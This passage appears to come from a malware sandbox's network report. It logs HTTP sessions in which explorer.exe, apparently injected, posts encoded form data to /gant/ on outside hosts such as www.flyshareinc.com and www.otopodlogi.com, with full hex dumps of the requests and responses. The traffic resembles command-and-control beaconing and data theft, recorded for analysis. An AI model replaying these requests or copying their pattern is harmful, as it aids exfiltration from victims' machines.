                                                                                                                  Data Ascii: cHxlXPzde0oXgIwO9MBQJrkm2EjIC~N0oRXQJ7H8_OmVNoFdUrzdMfOnhwcq5d6jAIYrTExM27Ou5jORft_tYq9unXUXZIJpXiE8ukhCK0gtFjBVd6kn343vU1XDCbr7NcKl6C1892XeIjfDy9j94gmuKB920FCxU(I728lTjiM9WOSXg94vWHJOCT30LeG0Mx09LG8nCCnH_fJMHAC6k0YaDFJGONozQJuoPIDgGqzrm2XS3hA
                                                                                                                  Feb 13, 2023 19:05:29.974055052 CET1489OUTData Raw: 6c 36 31 38 68 65 6d 45 6e 4d 6e 71 51 4b 62 64 55 4a 6d 35 64 55 4d 6b 6d 56 52 51 6b 49 71 76 52 78 4d 45 66 6b 48 28 70 4f 6c 51 65 49 66 4c 45 68 63 75 78 7e 34 6e 69 67 39 34 71 4e 6d 79 4c 36 59 47 32 44 5a 6a 74 43 42 74 38 75 6b 55 4f 59
                                                                                                                  Data Ascii: l618hemEnMnqQKbdUJm5dUMkmVRQkIqvRxMEfkH(pOlQeIfLEhcux~4nig94qNmyL6YG2DZjtCBt8ukUOYWXIgt6tsbBH18ywRB7OPUV3x208UeE_VxJsSCRUsT3gKf5LnVPXHfJH3IPd4Lf18OKwH24qTenG4b~Xe_RRBUECiXjUApAk3QI_RWFaQpP3BQi9Y6R_V4VwinEoPQck53G6T8(hWl7IvRp4ehDvPJrP~6tnwWE2aY
                                                                                                                  Feb 13, 2023 19:05:29.974176884 CET1496OUTData Raw: 32 4c 39 44 64 66 75 6e 75 42 4d 6f 63 43 44 76 51 30 38 77 61 45 6b 53 39 30 6a 47 59 48 4a 31 4e 62 5f 32 6a 72 73 30 7a 38 70 46 50 52 51 73 42 49 49 6f 53 53 4e 59 38 50 42 78 4b 71 77 41 37 75 65 66 47 38 6f 33 63 48 74 42 2d 6e 53 44 4d 47
                                                                                                                  Data Ascii: 2L9DdfunuBMocCDvQ08waEkS90jGYHJ1Nb_2jrs0z8pFPRQsBIIoSSNY8PBxKqwA7uefG8o3cHtB-nSDMG5lLeOcAIsjfIWF2sbWXcL4YSMijvTuahis1EKQluxUVP6Cm4iVRcXpr3qq5so0iEH9d6UGJ7JRPSNyW6d32ImpkOvupz9mXdiALvDwTe0q0fcdEbi5kDd9VtLHikKIBtf2dm6wI4I7u1rMliBnyZk9m9AL4Eucbx5
                                                                                                                  Feb 13, 2023 19:05:29.974339962 CET1498OUTData Raw: 53 43 63 28 64 78 43 55 70 46 45 51 5f 4d 74 39 4e 39 32 66 43 30 58 52 37 4f 50 67 33 4a 46 36 64 48 35 6d 35 30 5f 4a 42 5a 50 42 79 78 79 56 43 4e 53 7a 4d 5a 65 31 45 4d 42 65 46 69 64 6e 52 67 48 76 37 68 54 74 44 76 4b 77 66 4e 52 72 35 34
                                                                                                                  Data Ascii: SCc(dxCUpFEQ_Mt9N92fC0XR7OPg3JF6dH5m50_JBZPByxyVCNSzMZe1EMBeFidnRgHv7hTtDvKwfNRr54mqEHP~76EW5eAx_mEOv(ganeIhuSnJ4D26cilSAf3AlOxGmPofOF6w11q~SJ5VI~9jUwPOrfEsE0edQWsHV2dhfxoQIu5cH7g7-BqC_TtPowVDEQeyX3V6BnT7HZxqL8_WhoMm56yNuhjtGBGf2WKoBEsewymSqZh
                                                                                                                  Feb 13, 2023 19:05:29.982949018 CET1501OUTData Raw: 63 38 61 48 4b 46 47 6c 53 57 5f 4a 65 61 45 70 51 79 78 6a 6e 4b 74 4d 34 48 6a 43 53 45 54 38 4a 46 62 58 46 31 70 54 38 68 4b 55 53 7e 69 6c 73 59 69 32 55 38 5f 75 6d 6a 66 54 30 31 69 71 48 73 55 32 44 71 6c 5a 62 79 30 74 6e 54 49 78 70 59
                                                                                                                  Data Ascii: c8aHKFGlSW_JeaEpQyxjnKtM4HjCSET8JFbXF1pT8hKUS~ilsYi2U8_umjfT01iqHsU2DqlZby0tnTIxpYTxDS3lE3KVpM1xxi7y_x65KphKiIp2jWIuGJM6M6neuLD(z5iAOEjdO1C0Y11w2cm~QTAuF6iOvKzmgkOqLE8FvHmWUZT07zxuLGbBDmPhJEsH0xOMP(0AIpWrZ3P12ABVjn1ksUlm4k-~6kV7yQuU2WnDwCpOb(9
                                                                                                                  Feb 13, 2023 19:05:29.983129025 CET1506OUTData Raw: 50 33 4e 77 4a 7a 6c 6a 74 33 50 69 6e 46 47 4c 44 43 62 68 32 55 51 64 6d 6a 64 55 6b 34 2d 54 33 39 39 38 5a 6c 68 71 68 71 62 41 57 56 6c 5a 6d 51 65 6d 55 75 4b 48 69 44 55 6f 31 55 54 38 50 4d 4e 31 66 4c 37 42 54 77 7a 62 52 34 6e 6a 6b 71
                                                                                                                  Data Ascii: P3NwJzljt3PinFGLDCbh2UQdmjdUk4-T3998ZlhqhqbAWVlZmQemUuKHiDUo1UT8PMN1fL7BTwzbR4njkqzhLIff_NZdFZj5vx2sCJZ1XQjMbwX8ta4XsWRqPmJFBEYdDb27CLITvECattT5y0EvfpA0BXsepjnFYaN2lo1~vFtQ83fCSNdbq4R5jwy1NprPx2p1xh50dQNXTPA(Dst2vFsylcPERPyhlrCGMMZJqJdZgP-pa6l
                                                                                                                  Feb 13, 2023 19:05:29.983468056 CET1510OUTData Raw: 5f 79 39 7e 72 34 42 64 55 63 59 75 37 7e 6c 72 72 64 68 35 72 39 66 43 61 34 52 4e 6c 51 45 6b 61 61 63 4d 37 64 4e 70 73 31 64 67 4c 77 59 6a 49 65 2d 33 34 33 58 58 6d 6f 31 73 72 6c 2d 45 41 41 4b 48 6a 4e 53 35 4c 43 45 61 36 70 72 43 65 48
                                                                                                                  Data Ascii: _y9~r4BdUcYu7~lrrdh5r9fCa4RNlQEkaacM7dNps1dgLwYjIe-343XXmo1srl-EAAKHjNS5LCEa6prCeHftxLkntOzynKc6mR4WLp62JaMX1yz~LXFF38Dxaso34h7JzE6UHQ4xBX_hPTJXOJd4lhxU4o-YfcqVPN-uakRiZmTNLPyOYDKZ7K9xHuyCPhk4lEsC4lbKQMZNJn0m3(m0O3hKjD-qnSf~_AjExVCpZlexoEfpKsq
                                                                                                                  Feb 13, 2023 19:05:30.185806036 CET1514INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t2bGxKp9VQE67rI2ej%2FCRvdU8ARYFsjicS%2FK%2FYRMGFcnT%2Fc5MxeR%2B7Gb9xAckchpDnqsN3HJYDdN13vKtnTcbMddnazI4mTjnHTBSER2l3GxEmIQV40vVdCQ00WY3ctyExjbULQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7e165ce192c9-FRA
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 38 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c c7 8e 34 52 d1 75 bc a8 77 d3 c4 a8 1d b4 41 51 18 9c e1 1d 0d 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 d4 65 72 de 0a 5f 51 fa 9b 48 40 3a b8 ba 84 b3 df e7 10 fa 01 88 25 b3 76 46 94 a6 9f 2d 08 7c 0d 5a 72 81 04 24 53 8b 19 41 45 3f de 90 39 84 af 7e 43 c5 45 f2 3b a5 4f a2 2a 39 00 c7 45 9d 7d 9b a8 f3 17 44 9d 7f 83 a8 85 ab a4 f9 8e 63 56 1e 4a a1 74 57 52 8a 8c cf 5b a1 13 4e e2 fc ed fb 1b c8 b5 50 ce 82 d3 90 1b 9d 8a 48 38 e4 70 75 0d 7f c2 7a bd ee 6b a7 73 cd a5 5e 88 7e ac 33 f8 13 2e a4 5e f2 44 32 83 61 50 0a 69 85 19 3a 06 71 ca 8c 45 37 23 1f 6f ff 45 cf 09 04 f5 40 ea 5c 4e f1 8f a5 58 cd c8 85 56 0e 95 a3 b7 9b 1c 09 c4 65 6b 46 1c 3e b8 c0 1b 33 dd 8a 79 49 ca af f4 e3 0f f4 42 67 39 73 22 92 4d 41 57 97 b3 4b be c0 c6 3a c5 32 9c 11 a3 23 ed 6c 63 a2 d2 42 71 7c e8 81 d2 89 96 52 af 0f 96 ac 04 ae 73 6d 5c 63 d1 5a 70 97 ce 38 ae 44 8c b4 68 f4 84 12 4e 30 49 6d cc 24 ce 86 a5 14 29 d4 3d 18 94 33 62 dd 46 a2 4d 11 1d 01 c1 67 24 4e ee ca 2e 1a 5b 4b 20 35 98 cc 48 10 73 45 e3 85 08 ca a1 20 63 42 f5 8b f1 60 de 6a b5 42 1b 1b 91 bb 79 ab 93 2c 55 ec 84 56 9d ee 17 91
                                                                                                                  Data Ascii: 890Xko7_qT5,4RuwAQc9%)B<n`_qxyxWo?\~er_QH@:%vF-|Zr$SAE?9~CE;O*9E}DcVJtWR[NPH8puzks^~3.^D2aPi:qE7#oE@\NXVekF>3yIBg9s"MAWK:2#lcBq|Rsm\cZp8DhN0Im$)=3bFMg$N.[K 5HsE cB`jBy,UV
                                                                                                                  Feb 13, 2023 19:05:30.185885906 CET1516INData Raw: 74 b8 8e 97 19 2a d7 67 9c 5f ae 50 b9 77 c2 3a 54 68 da ed b5 50 5c af fb bf fe f4 ee 47 e7 f2 9f f1 8f 25 5a d7 6e ff fb e6 c3 fb f2 7f df 3a 23 d4 42 24 9b ee 97 15 33 80 b3 ad 6c 56 f6 c4 b3 ad fc 05 ba 4b 89 fe f3 9f 9b 2b de 21 68 8c 36 34
                                                                                                                  Data Ascii: t*g_Pw:ThP\G%Zn:#B$3lVK+!h64A]nHaIf7hBK#'h'_d8z)<YXd8:G!nnIxIxg"Xb{F}RGdMg=\yV)7zibl
                                                                                                                  Feb 13, 2023 19:05:30.185941935 CET1516INData Raw: e8 a5 f2 f4 b6 d0 fd 18 19 05 b7 c9 71 46 ca 1e 32 ff 84 36 0c ca c6 fc ef 53 4c e9 7d bd de eb 5d b5 f6 99 d6 7e 84 ab a7 18 ec 73 e2 e3 31 2c 9f 6d 4f 06 df a6 4c dd 17 27 ce 63 76 a3 97 66 2b e8 55 73 fb 3a 4d 1d c1 da 96 f6 95 90 80 27 be 7a
                                                                                                                  Data Ascii: qF26SL}]~s1,mOL'cvf+Us:M'zgy6:.~=>X=A.AI5|'Ojt7KT:S0{f#SO@9j1Sjgt3.8?d`o7"'V%Ch~av.w2ylzFNy'}
                                                                                                                  Feb 13, 2023 19:05:30.185992956 CET1516INData Raw: 61 0d 0a 03 00 a7 a9 21 53 c0 17 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: a!S0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  63192.168.11.2049920188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:32.492784023 CET1517OUTGET /gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:05:32.694924116 CET1518INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:32 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 16
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BImvFNT3FOOlkeMfL6I62XRQwIif4X39yHzoPGdgzMw1FXkHQ5CR%2Bh%2FGnElt3HWNiW7hsmdly4ACn%2FcLkyYtabeX20P8b2Sho1HZYY00aEpxz%2FeEpF2RsDCTKMexgdkPyuUXrik%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7e261d4c35e4-FRA
                                                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 30
                                                                                                                  Data Ascii: error code: 1000


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  64192.168.11.2049921162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:37.865704060 CET1519OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.flyshareinc.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.flyshareinc.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 70 62 32 2d 48 4e 32 5a 6d 30 73 30 32 41 37 5a 66 47 52 49 30 7a 6b 48 61 72 57 56 54 69 42 46 71 52 64 71 73 57 73 44 7e 31 57 52 63 58 6f 63 5a 56 64 55 44 69 58 49 61 51 76 42 4a 59 56 50 31 4a 72 45 42 74 62 58 70 2d 7a 63 59 36 5a 59 7e 4f 79 61 66 49 32 76 52 64 69 79 45 67 41 4a 79 68 4e 72 44 53 70 77 72 59 4b 75 52 6b 52 32 42 31 75 68 41 72 4c 45 51 6d 4b 32 61 6f 53 78 61 44 62 42 45 6f 39 56 66 43 39 41 37 39 72 7a 63 62 58 5a 35 58 54 45 37 41 51 74 53 35 43 52 28 43 63 58 62 75 47 46 59 39 42 75 31 54 42 44 49 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=pb2-HN2Zm0s02A7ZfGRI0zkHarWVTiBFqRdqsWsD~1WRcXocZVdUDiXIaQvBJYVP1JrEBtbXp-zcY6ZY~OyafI2vRdiyEgAJyhNrDSpwrYKuRkR2B1uhArLEQmK2aoSxaDbBEo9VfC9A79rzcbXZ5XTE7AQtS5CR(CcXbuGFY9Bu1TBDIQ).
                                                                                                                  Feb 13, 2023 19:05:38.044008017 CET1519INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:37 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  65192.168.11.2049922162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:40.550384045 CET1521OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.flyshareinc.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.flyshareinc.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 70 62 32 2d 48 4e 32 5a 6d 30 73 30 35 44 7a 5a 65 6c 4a 49 31 54 6b 41 56 4c 57 56 59 43 42 42 71 52 52 71 73 58 59 31 7e 48 79 52 66 32 59 63 59 51 68 55 43 69 58 49 52 77 76 4f 45 34 56 52 31 4a 6e 4d 42 76 50 58 70 5f 58 63 4b 35 52 59 34 2d 7a 4d 48 34 32 77 57 64 6a 31 58 77 41 35 79 68 52 64 44 54 4e 77 73 73 36 75 58 57 4a 32 58 30 75 6d 45 4c 4c 34 53 6d 4b 78 55 49 53 76 61 44 6e 6a 45 74 51 67 65 30 31 41 36 64 4c 7a 64 62 58 65 78 6e 54 44 35 41 52 65 62 4c 58 4e 7e 43 55 4f 4f 73 47 71 59 64 41 41 36 44 41 32 57 53 44 49 61 67 47 70 37 48 4f 41 49 63 6e 4e 6a 45 4a 47 64 68 77 32 28 51 42 48 4b 55 38 77 64 6b 6d 5a 59 66 59 46 4b 34 34 58 78 78 6d 78 35 49 71 42 6f 78 79 2d 46 59 4e 46 56 73 4a 53 49 4a 79 4f 34 34 56 56 59 4b 6a 5a 72 4f 34 6a 42 41 4e 58 45 30 76 4d 6b 76 4c 66 74 57 4b 69 39 4d 4f 37 6b 6f 6f 73 72 4f 7e 37 75 6e 52 79 6a 51 49 30 67 6d 45 63 4c 79 6e 73 69 31 72 79 49 54 57 6f 55 34 33 31 70 39 33 47 7a 6e 43 33 48 68 45 64 70 74 56 79 38 4c 39 73 68 61 44 49 56 63 54 38 72 64 79 6e 64 54 52 75 6d 5f 79 2d 4f 6b 59 33 7a 53 37 6a 45 30 4d 70 46 43 4c 38 4b 4d 79 4b 4f 75 49 69 52 46 58 31 45 48 4f 6a 35 6e 30 4a 48 77 72 43 6b 31 35 49 47 30 4b 6e 47 61 4a 46 7e 43 71 55 55 43 38 62 68 34 28 76 31 66 77 79 70 67 57 65 66 33 38 49 69 7a 28 6a 6f 65 46 73 59 56 65 42 62 39 79 6e 66 30 53 62 77 59 54 49 4a 77 4f 49 41 57 63 78 42 5f 63 38 71 6e 4d 77 54 69 42 44 52 63 5a 52 30 67 74 4c 69 52 42 30 32 61 4f 4e 4c 53 6a 35 51 44 5a 74 66 73 57 31 33 65 49 35 6a 57 41 33 34 66 78 6d 42 70 55 43 30 48 41 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=pb2-HN2Zm0s05DzZelJI1TkAVLWVYCBBqRRqsXY1~HyRf2YcYQhUCiXIRwvOE4VR1JnMBvPXp_XcK5RY4-zMH42wWdj1XwA5yhRdDTNwss6uXWJ2X0umELL4SmKxUISvaDnjEtQge01A6dLzdbXexnTD5ARebLXN~CUOOsGqYdAA6DA2WSDIagGp7HOAIcnNjEJGdhw2(QBHKU8wdkmZYfYFK44Xxxmx5IqBoxy-FYNFVsJSIJyO44VVYKjZrO4jBANXE0vMkvLftWKi9MO7koosrO~7unRyjQI0gmEcLynsi1ryITWoU431p93GznC3HhEdptVy8L9shaDIVcT8rdyndTRum_y-OkY3zS7jE0MpFCL8KMyKOuIiRFX1EHOj5n0JHwrCk15IG0KnGaJF~CqUUC8bh4(v1fwypgWef38Iiz(joeFsYVeBb9ynf0SbwYTIJwOIAWcxB_c8qnMwTiBDRcZR0gtLiRB02aONLSj5QDZtfsW13eI5jWA34fxmBpUC0HA.
                                                                                                                  Feb 13, 2023 19:05:40.721131086 CET1521INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:40 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  66192.168.11.2049923162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:43.236268997 CET1524OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.flyshareinc.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.flyshareinc.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 70 62 32 2d 48 4e 32 5a 6d 30 73 30 35 44 7a 5a 65 6c 4a 49 31 54 6b 41 56 4c 57 56 59 43 42 42 71 52 52 71 73 58 59 31 7e 48 36 52 63 45 41 63 65 7a 4a 55 51 79 58 49 53 77 75 4a 45 34 55 55 31 4a 28 79 42 76 7a 74 70 38 28 63 4b 4f 56 59 34 4d 62 4d 43 34 32 74 4b 74 6a 6b 45 67 41 74 79 68 4e 4a 44 58 63 4e 72 59 79 75 52 6c 68 32 42 58 32 68 5a 72 4c 45 53 6d 4b 44 65 6f 53 64 61 44 53 75 45 74 63 67 65 32 42 41 37 72 50 7a 62 4d 37 65 34 58 54 41 7a 67 52 52 52 72 58 43 7e 42 6f 77 4f 73 47 63 59 63 45 41 36 42 59 32 58 56 58 4a 61 41 47 70 6c 58 4f 48 4d 63 62 42 6a 46 68 67 64 68 45 32 28 58 46 48 4b 30 38 77 4e 31 6d 61 4f 76 59 48 62 49 34 41 31 78 69 70 35 4a 4f 37 6f 7a 7e 2d 45 70 70 46 48 4c 56 53 4b 6f 79 4f 6b 49 56 58 63 4b 69 66 68 75 35 6e 42 44 31 78 45 30 4f 35 6b 73 48 66 73 32 71 69 35 64 4f 30 73 6f 6f 71 31 2d 7e 55 71 69 4a 58 6a 54 77 6f 67 6d 45 31 4c 77 4c 73 68 41 6a 79 4a 51 4f 72 53 6f 33 32 76 39 33 66 39 48 7e 35 48 69 67 56 70 74 73 5f 38 4d 64 73 6e 36 44 49 65 62 4f 71 68 74 79 67 41 44 52 47 6f 66 79 74 4f 6b 6b 72 7a 58 43 59 45 41 30 70 48 7a 33 38 62 4d 79 4a 4b 4f 49 6d 49 31 58 37 58 58 4f 6a 35 6e 35 34 48 77 58 43 6b 42 39 49 45 44 47 6e 44 4e 64 46 38 43 72 64 55 43 38 4f 68 34 44 63 31 65 49 63 70 68 6d 34 66 31 51 49 69 48 37 6a 72 66 46 72 65 6c 65 41 4e 4e 7a 78 63 45 50 5a 77 59 6e 36 4a 77 65 48 41 45 49 78 41 5f 4d 38 67 48 4d 33 59 69 42 45 48 4d 5a 48 77 67 67 50 69 52 74 4b 32 5a 53 64 4c 51 7a 35 54 57 34 77 4f 64 4b 68 69 4f 59 34 76 77 45 54 77 63 74 74 61 36 51 6f 67 79 51 77 38 73 61 6a 45 6f 57 67 4f 71 38 4f 46 56 4b 79 50 37 7a 44 75 65 4d 79 34 73 6e 62 66 77 65 6b 28 73 61 55 38 70 6e 31 69 38 7e 55 66 6e 59 7a 67 76 77 56 28 5f 4e 71 74 50 58 67 71 72 6d 4b 4c 4c 4f 30 46 56 39 48 32 6c 6a 30 37 67 6a 50 50 51 4c 63 37 45 6f 44 6d 4b 67 78 4d 49 4f 56 34 49 35 66 76 2d 4f 47 4e 68 61 38 31 73 32 55 71 45 28 77 68 66 75 74 48 33 72 63 67 36 74 48 69 79 62 69 58 75 7e 61 77 38 72 73 70 59 68 4c 77 59 30 79 57 4a 47 42 65 30 67 50 56 72 4f 4a 45 2d 4a 54 43 46 30 5a 61 37 67 44 75 48 6f 34 66 53 38 6e 28 4b 44 74 6b 36 62 7a 71 4f 63 4d 34 77 72 76 68 32 70 73 75 39 49 59 47 58 68 2d 6a 49 4e 4f 52 48 79 55 4d 75 55 4a 65 71 4b 66 7a 35 30 74 58 4f 74 69 75 42 78 4b 6c 4c 58 67 4a 56 57 70 47 44 4b 61 37 58 71 4a 58 77 6e 62 58 4a 68 2d 33 58 49 4b 63 30 65 56 38 4c 72 38 51 5a 6b 68 73 59 76 79 42 5a 4e 6e 59 78 6e 69 6a 56 49 7a 58 71 4c 70 48 68 28 50 46 41 75 4c 59 47 53 68 62 48 76 78 63 67 78 79 4a 44 54 70 41 49 52 73 56 76 36 51 4d 46 7e 69 65 5a 73 53 6f 39 39 52 7e 67 48 68 67 4e 44 51 7e 68 52 4a 79 35 28 33 6d 47 31 36 44 34 4a 4e 75 77 45 48 49 39 4f 4d 46 32 70 73 56 51 72 37 72 65 39 78 48 78 52 35 54 73 61 4d 78 66 35 65 6b 45 49 6c 66 54 4c 50 35 62 46 30 66 42 53 30 48 74 7a 39 70 51 42 58 63 47 63 66 6f 41 67 38 6f 4c 6d 4d 61 55 61 35 4b 47 58 44 4d 39 72 4b 64 4c 71 67 73 45 6b 4d 45 6a 7a 35 59 42 33 64 43 35 6c 51 50 6d 72 5f 4e 63 51 56 42 33 79 31 79 72 72 65 4a 61 57 34 35 4c 31 5a 33 77 64 4c 68 73 65 33 56 6a 7a 4c 62 6b 46 6f 64 4c 